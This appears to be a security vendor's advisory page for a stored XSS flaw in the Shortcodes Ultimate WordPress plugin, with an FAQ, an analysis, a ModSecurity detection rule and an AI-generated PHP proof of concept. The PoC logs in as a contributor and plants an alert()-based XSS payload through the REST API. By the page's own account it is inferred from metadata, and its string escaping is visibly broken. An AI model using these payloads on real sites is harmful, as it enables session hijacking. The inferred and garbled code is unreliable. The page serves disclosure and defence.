What is CVE-2026-2480?

CVE-2026-2480 is a stored cross-site scripting (XSS) vulnerability in the WP Shortcodes Plugin — Shortcodes Ultimate, affecting versions up to 7.4.10. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘max_width’ attribute of the ‘su_box’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping for the ‘max_width’ attribute in the ‘su_box’ shortcode. An attacker can create or edit posts to include a malicious payload, which will execute in the browser of any user who views the compromised content.

Who is affected by this vulnerability?

Authenticated users with contributor-level access or higher are affected, as they can exploit the vulnerability by injecting malicious code into posts or pages. All users who view the compromised content are at risk of executing the injected scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Shortcodes Ultimate plugin in use. If it is version 7.4.10 or earlier, your site is susceptible to this vulnerability. Additionally, review any posts or pages containing the ‘su_box’ shortcode for potential malicious attributes.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-2480 is 6.4, indicating a medium severity vulnerability. This score suggests that while the vulnerability can lead to significant issues, it requires authenticated access to exploit, limiting its immediate risk compared to more severe vulnerabilities.

How can I mitigate the risk of this vulnerability?

To mitigate the risk, update the Shortcodes Ultimate plugin to version 7.5.0 or later, which contains the necessary fixes. Additionally, ensure that proper input validation and output escaping are implemented for all user-controlled attributes in your WordPress environment.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by injecting a malicious payload through the WordPress REST API. It shows that the attacker can create or edit a post with a vulnerable shortcode, leading to the execution of arbitrary JavaScript when the post is viewed.

What are the potential consequences of exploitation?

Successful exploitation can lead to session hijacking, unauthorized administrative actions, content defacement, or redirection to malicious sites. Since the attack is stored, it affects all users who access the compromised content, increasing the potential impact.

What are the recommended security practices for WordPress?

Regularly update all plugins and themes to their latest versions to protect against known vulnerabilities. Implement a security plugin that monitors for suspicious activity and consider using a web application firewall to filter out malicious requests.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 1, 2026

CVE-2026-2480: WP Shortcodes Plugin — Shortcodes Ultimate <= 7.4.10 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'max_width' Shortcode Attribute (shortcodes-ultimate)

Q: How does the scope change in the CVSS vector affect the risk?

The scope change indicates that the vulnerability can impact components beyond the vulnerable plugin itself, potentially affecting the entire WordPress installation. This means that an attack could compromise user sessions and affect other parts of the site, increasing the overall risk.

CVE ID CVE-2026-2480

Plugin shortcodes-ultimate

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 7.4.10

Patched Version —

Disclosed March 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2480 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Shortcodes Ultimate WordPress plugin, affecting versions up to and including 7.4.10. The vulnerability resides in the plugin’s `su_box` shortcode handler, specifically in its processing of the `max_width` attribute. Attackers with contributor-level permissions or higher can inject malicious scripts into posts or pages, which execute when visitors view the compromised content. The CVSS score of 6.4 reflects a medium severity issue with scope change, indicating the attack can impact users beyond the vulnerable component.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping for user-supplied shortcode attributes. The CWE-79 classification confirms improper neutralization of input during web page generation. The vulnerability description explicitly states the `max_width` attribute of the `su_box` shortcode lacks proper validation. Without access to source code, this conclusion is inferred from the CWE and vendor description. The plugin likely directly echoes the `max_width` attribute value into HTML output without applying WordPress sanitization functions like `esc_attr()` or `wp_kses()`.

Exploitation requires an authenticated user with at least contributor-level access. The attacker creates or edits a post or page, inserting the vulnerable shortcode with a malicious `max_width` attribute payload. The attack vector is the WordPress post editor, either via the classic editor’s text view or the block editor’s shortcode block. A typical payload would be: `[su_box max_width=”100px” onmouseover=”alert(document.cookie)”]Content[/su_box]`. The plugin’s shortcode handler processes this input, and the unsanitized attribute renders as part of the box element’s HTML style attribute or a wrapper div, enabling script execution.

Remediation requires proper output escaping on all user-controlled shortcode attributes. The patched version 7.5.0 likely implements WordPress escaping functions such as `esc_attr()` for attribute values and `wp_kses()` for any HTML output. The fix should also include input validation to ensure the `max_width` attribute contains only expected values like pixel or percentage units. A defense-in-depth approach would involve implementing a strict allowlist of safe CSS properties and values for style-related attributes.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of a victim’s browser session. This can lead to session hijacking, administrative actions performed on behalf of users, content defacement, or redirection to malicious sites. The stored nature means a single injection affects all users who view the compromised page. Contributor-level attackers, who normally cannot publish posts, can still create pending posts containing the exploit, which administrators might approve unknowingly. The scope change (S:C) in the CVSS vector indicates the vulnerability can impact components beyond the plugin itself, potentially affecting the entire WordPress installation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2480 (metadata-based)
# This rule targets the specific attack vector: POST requests containing the vulnerable shortcode
# with malicious 'max_width' attribute payloads.
# Rule matches when both conditions are met:
# 1. Request is to WordPress post creation/update endpoints
# 2. Request body contains the su_box shortcode with suspicious max_width attribute
SecRule REQUEST_METHOD "@streq POST" 
  "id:20262480,phase:2,deny,status:403,chain,msg:'CVE-2026-2480: Shortcodes Ultimate Stored XSS via max_width attribute',severity:'CRITICAL',tag:'CVE-2026-2480',tag:'WordPress',tag:'Plugin',tag:'shortcodes-ultimate',tag:'XSS'"
  SecRule REQUEST_URI "@rx ^/(wp-admin/post.php|wp-admin/admin-ajax.php|wp-json/wp/v2/(posts|pages))" 
    "chain"
    SecRule REQUEST_BODY "@rx \[su_box[^\]]*max_width\s*=\s*['"]?[^'"\s>]*[\s"'`;]?on[\w]{3,}\s*=" " 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2480 - WP Shortcodes Plugin — Shortcodes Ultimate <= 7.4.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'max_width' Shortcode Attribute
<?php
/**
 * Proof of Concept for CVE-2026-2480
 * Assumptions based on vulnerability description:
 * 1. The plugin registers a shortcode 'su_box' with attribute 'max_width'
 * 2. The attribute value is not properly sanitized before output
 * 3. Contributor-level users can create/edit posts with shortcodes
 * 4. The attack vector is the WordPress post editor via POST requests
 *
 * This script simulates an authenticated attacker injecting a stored XSS payload
 * via the WordPress REST API posts endpoint (common modern editor).
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// Payload: XSS via onmouseover event in style attribute (common bypass)
$payload = '100px; onmouseover="alert('XSS via CVE-2026-2480')" style="color:red"';

// First, authenticate to get a nonce and cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-json/jwt-auth/v1/token',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => json_encode([
        'username' => $username,
        'password' => $password
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        'Accept: application/json'
    ]
]);

$response = curl_exec($ch);
$auth_data = json_decode($response, true);

if (empty($auth_data['token'])) {
    // Fallback to cookie-based authentication
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . '/wp-login.php',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query([
            'log' => $username,
            'pwd' => $password,
            'wp-submit' => 'Log In'
        ]),
        CURLOPT_HEADER => true,
        CURLOPT_COOKIEJAR => 'cookies.txt',
        CURLOPT_COOKIEFILE => 'cookies.txt'
    ]);
    $login_response = curl_exec($ch);
    
    // Get REST API nonce for authenticated requests
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . '/wp-json/wp/v2/posts',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPGET => true,
        CURLOPT_HEADER => false,
        CURLOPT_COOKIEFILE => 'cookies.txt'
    ]);
    $posts_response = curl_exec($ch);
} else {
    // JWT authentication successful
    $token = $auth_data['token'];
}

// Create a new post with the malicious shortcode
$post_content = "Normal post content here.nn[su_box title="Malicious Box" max_width="" . $payload . ""]nThis box contains a stored XSS payload in the max_width attribute.n[/su_box]nnMore content here.";

$post_data = [
    'title' => 'Test Post with XSS',
    'content' => $post_content,
    'status' => 'draft', // Contributor can only create drafts
    'type' => 'post'
];

if (!empty($token)) {
    // JWT authenticated request
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . '/wp-json/wp/v2/posts',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => json_encode($post_data),
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/json',
            'Authorization: Bearer ' . $token
        ]
    ]);
} else {
    // Cookie-based authenticated request (need nonce for REST API)
    // For simplicity, this example assumes classic editor POST
    // In real exploitation, attacker would use the actual editor interface
    echo "Authentication method requires nonce retrieval for full PoC.n";
    echo "Manual exploitation: Create a post with this shortcode:n";
    echo '[su_box title="Malicious Box" max_width="' . $payload . '"]' . "n";
    echo "Contentn";
    echo '[/su_box]';
    curl_close($ch);
    exit;
}

$result = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 201) {
    $post_result = json_decode($result, true);
    echo "Success! Post created with ID: " . $post_result['id'] . "n";
    echo "View at: " . $post_result['link'] . "n";
    echo "Payload will execute when users view the post and mouse over the box.n";
} else {
    echo "Failed to create post. HTTP Code: " . $http_code . "n";
    echo "Response: " . $result . "n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-2480?
Overview of the vulnerability
CVE-2026-2480 is a stored cross-site scripting (XSS) vulnerability in the WP Shortcodes Plugin — Shortcodes Ultimate, affecting versions up to 7.4.10. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘max_width’ attribute of the ‘su_box’ shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping for the ‘max_width’ attribute in the ‘su_box’ shortcode. An attacker can create or edit posts to include a malicious payload, which will execute in the browser of any user who views the compromised content.
Who is affected by this vulnerability?
User roles and impact
Authenticated users with contributor-level access or higher are affected, as they can exploit the vulnerability by injecting malicious code into posts or pages. All users who view the compromised content are at risk of executing the injected scripts.
How can I check if my site is vulnerable?
Identifying vulnerable installations
To check if your site is vulnerable, verify the version of the Shortcodes Ultimate plugin in use. If it is version 7.4.10 or earlier, your site is susceptible to this vulnerability. Additionally, review any posts or pages containing the ‘su_box’ shortcode for potential malicious attributes.
What is the CVSS score and what does it mean?
Understanding risk assessment
The CVSS score for CVE-2026-2480 is 6.4, indicating a medium severity vulnerability. This score suggests that while the vulnerability can lead to significant issues, it requires authenticated access to exploit, limiting its immediate risk compared to more severe vulnerabilities.
How can I mitigate the risk of this vulnerability?
Recommended actions
To mitigate the risk, update the Shortcodes Ultimate plugin to version 7.5.0 or later, which contains the necessary fixes. Additionally, ensure that proper input validation and output escaping are implemented for all user-controlled attributes in your WordPress environment.
What does the proof of concept demonstrate?
Technical illustration of the issue
The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by injecting a malicious payload through the WordPress REST API. It shows that the attacker can create or edit a post with a vulnerable shortcode, leading to the execution of arbitrary JavaScript when the post is viewed.
What are the potential consequences of exploitation?
Risks associated with the vulnerability
Successful exploitation can lead to session hijacking, unauthorized administrative actions, content defacement, or redirection to malicious sites. Since the attack is stored, it affects all users who access the compromised content, increasing the potential impact.
What are the recommended security practices for WordPress?
General security advice
Regularly update all plugins and themes to their latest versions to protect against known vulnerabilities. Implement a security plugin that monitors for suspicious activity and consider using a web application firewall to filter out malicious requests.
How does the scope change in the CVSS vector affect the risk?
Understanding scope in CVSS
The scope change indicates that the vulnerability can impact components beyond the vulnerable plugin itself, potentially affecting the entire WordPress installation. This means that an attack could compromise user sessions and affect other parts of the site, increasing the overall risk.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations